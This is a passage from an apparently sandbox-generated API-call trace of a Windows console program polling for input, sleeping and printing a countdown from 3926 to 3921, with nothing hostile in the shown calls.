[0158.614] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0158.614] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffa
[0158.614] Sleep (dwMilliseconds=0x64)
[0158.801] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0158.801] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffa
[0158.801] Sleep (dwMilliseconds=0x64)
[0158.957] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0158.958] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffa
[0158.958] Sleep (dwMilliseconds=0x64)
[0159.145] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0159.145] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffa
[0159.145] Sleep (dwMilliseconds=0x64)
[0159.332] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0159.332] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffb
[0159.333] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083926") returned 8
[0159.333] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0159.333] __iob_func () returned 0x757a2900
[0159.333] _fileno (_File=0x757a2920) returned 1
[0159.333] _errno () returned 0x5507d8
[0159.333] _get_osfhandle (_FileHandle=1) returned 0x4c
[0159.333] _errno () returned 0x5507d8
[0159.333] GetFileType (hFile=0x4c) returned 0x2
[0159.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0159.333] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0159.333] lstrlenW (lpString="\x08\x08\x08\x083926") returned 8
[0159.333] GetConsoleOutputCP () returned 0x1b5
[0159.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083926", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0159.333] GetConsoleOutputCP () returned 0x1b5
[0159.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083926", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083926", lpUsedDefaultChar=0x0) returned 8
[0159.333] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0159.333] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0159.333] Sleep (dwMilliseconds=0x64)
[0159.521] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0159.521] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffb
[0159.521] Sleep (dwMilliseconds=0x64)
[0159.706] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0159.706] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffb
[0159.706] Sleep (dwMilliseconds=0x64)
[0159.893] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0159.894] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffb
[0159.894] Sleep (dwMilliseconds=0x64)
[0160.065] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.065] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffb
[0160.065] Sleep (dwMilliseconds=0x64)
[0160.221] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.221] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0160.221] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083925") returned 8
[0160.221] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0160.221] __iob_func () returned 0x757a2900
[0160.221] _fileno (_File=0x757a2920) returned 1
[0160.221] _errno () returned 0x5507d8
[0160.221] _get_osfhandle (_FileHandle=1) returned 0x4c
[0160.221] _errno () returned 0x5507d8
[0160.221] GetFileType (hFile=0x4c) returned 0x2
[0160.221] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0160.222] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0160.222] lstrlenW (lpString="\x08\x08\x08\x083925") returned 8
[0160.222] GetConsoleOutputCP () returned 0x1b5
[0160.222] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083925", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0160.222] GetConsoleOutputCP () returned 0x1b5
[0160.222] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083925", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083925", lpUsedDefaultChar=0x0) returned 8
[0160.222] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0160.222] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0160.222] Sleep (dwMilliseconds=0x64)
[0160.330] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.331] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0160.331] Sleep (dwMilliseconds=0x64)
[0160.470] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.471] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0160.471] Sleep (dwMilliseconds=0x64)
[0160.611] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.611] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0160.611] Sleep (dwMilliseconds=0x64)
[0160.720] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.720] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0160.720] Sleep (dwMilliseconds=0x64)
[0160.832] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.832] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0160.832] Sleep (dwMilliseconds=0x64)
[0160.939] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0160.939] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0160.939] Sleep (dwMilliseconds=0x64)
[0161.048] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.048] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0161.048] Sleep (dwMilliseconds=0x64)
[0161.157] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.158] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffc
[0161.158] Sleep (dwMilliseconds=0x64)
[0161.266] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.267] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0161.267] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083924") returned 8
[0161.267] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0161.267] __iob_func () returned 0x757a2900
[0161.267] _fileno (_File=0x757a2920) returned 1
[0161.267] _errno () returned 0x5507d8
[0161.267] _get_osfhandle (_FileHandle=1) returned 0x4c
[0161.267] _errno () returned 0x5507d8
[0161.267] GetFileType (hFile=0x4c) returned 0x2
[0161.267] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0161.267] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0161.267] lstrlenW (lpString="\x08\x08\x08\x083924") returned 8
[0161.267] GetConsoleOutputCP () returned 0x1b5
[0161.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083924", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0161.267] GetConsoleOutputCP () returned 0x1b5
[0161.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083924", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083924", lpUsedDefaultChar=0x0) returned 8
[0161.267] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0161.268] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0161.268] Sleep (dwMilliseconds=0x64)
[0161.375] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.376] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0161.376] Sleep (dwMilliseconds=0x64)
[0161.485] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.485] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0161.485] Sleep (dwMilliseconds=0x64)
[0161.594] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.594] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0161.594] Sleep (dwMilliseconds=0x64)
[0161.703] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.704] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0161.704] Sleep (dwMilliseconds=0x64)
[0161.812] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.812] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0161.812] Sleep (dwMilliseconds=0x64)
[0161.921] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0161.922] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0161.922] Sleep (dwMilliseconds=0x64)
[0162.031] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.031] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0162.031] Sleep (dwMilliseconds=0x64)
[0162.140] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.140] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffd
[0162.140] Sleep (dwMilliseconds=0x64)
[0162.249] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.249] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0162.249] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083923") returned 8
[0162.249] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0162.249] __iob_func () returned 0x757a2900
[0162.249] _fileno (_File=0x757a2920) returned 1
[0162.250] _errno () returned 0x5507d8
[0162.250] _get_osfhandle (_FileHandle=1) returned 0x4c
[0162.250] _errno () returned 0x5507d8
[0162.250] GetFileType (hFile=0x4c) returned 0x2
[0162.250] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0162.250] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0162.250] lstrlenW (lpString="\x08\x08\x08\x083923") returned 8
[0162.250] GetConsoleOutputCP () returned 0x1b5
[0162.250] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083923", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0162.250] GetConsoleOutputCP () returned 0x1b5
[0162.250] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083923", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083923", lpUsedDefaultChar=0x0) returned 8
[0162.250] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0162.250] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0162.250] Sleep (dwMilliseconds=0x64)
[0162.358] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.358] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0162.358] Sleep (dwMilliseconds=0x64)
[0162.469] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.469] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0162.469] Sleep (dwMilliseconds=0x64)
[0162.577] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.577] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0162.577] Sleep (dwMilliseconds=0x64)
[0162.686] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.686] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0162.686] Sleep (dwMilliseconds=0x64)
[0162.795] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.795] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0162.795] Sleep (dwMilliseconds=0x64)
[0162.904] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0162.904] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0162.904] Sleep (dwMilliseconds=0x64)
[0163.013] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.014] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0163.014] Sleep (dwMilliseconds=0x64)
[0163.123] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.123] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffe
[0163.123] Sleep (dwMilliseconds=0x64)
[0163.232] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.232] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.232] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083922") returned 8
[0163.232] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0163.232] __iob_func () returned 0x757a2900
[0163.232] _fileno (_File=0x757a2920) returned 1
[0163.232] _errno () returned 0x5507d8
[0163.232] _get_osfhandle (_FileHandle=1) returned 0x4c
[0163.232] _errno () returned 0x5507d8
[0163.232] GetFileType (hFile=0x4c) returned 0x2
[0163.233] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0163.233] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0163.233] lstrlenW (lpString="\x08\x08\x08\x083922") returned 8
[0163.233] GetConsoleOutputCP () returned 0x1b5
[0163.233] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083922", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0163.233] GetConsoleOutputCP () returned 0x1b5
[0163.233] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083922", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083922", lpUsedDefaultChar=0x0) returned 8
[0163.233] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0163.233] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0163.233] Sleep (dwMilliseconds=0x64)
[0163.341] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.341] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.341] Sleep (dwMilliseconds=0x64)
[0163.450] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.450] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.451] Sleep (dwMilliseconds=0x64)
[0163.559] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.560] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.560] Sleep (dwMilliseconds=0x64)
[0163.669] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.669] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.669] Sleep (dwMilliseconds=0x64)
[0163.778] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.778] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.778] Sleep (dwMilliseconds=0x64)
[0163.887] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.887] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.887] Sleep (dwMilliseconds=0x64)
[0163.996] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0163.996] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0163.996] Sleep (dwMilliseconds=0x64)
[0164.105] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.106] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0164.106] Sleep (dwMilliseconds=0x64)
[0164.215] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.215] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5fff
[0164.215] Sleep (dwMilliseconds=0x64)
[0164.332] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.332] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0164.332] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083921") returned 8
[0164.332] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0164.332] __iob_func () returned 0x757a2900
[0164.332] _fileno (_File=0x757a2920) returned 1
[0164.332] _errno () returned 0x5507d8
[0164.332] _get_osfhandle (_FileHandle=1) returned 0x4c
[0164.332] _errno () returned 0x5507d8
[0164.332] GetFileType (hFile=0x4c) returned 0x2
[0164.333] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0164.333] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0164.333] lstrlenW (lpString="\x08\x08\x08\x083921") returned 8
[0164.333] GetConsoleOutputCP () returned 0x1b5
[0164.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083921", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0164.333] GetConsoleOutputCP () returned 0x1b5
[0164.333] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083921", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083921", lpUsedDefaultChar=0x0) returned 8
[0164.333] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0164.333] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0164.333] Sleep (dwMilliseconds=0x64)
[0164.433] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.433] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0164.433] Sleep (dwMilliseconds=0x64)
[0164.542] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.542] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0164.542] Sleep (dwMilliseconds=0x64)
[0164.651] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0164.652] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd6000
[0164.652] Sleep (dwMilliseconds=0x64)
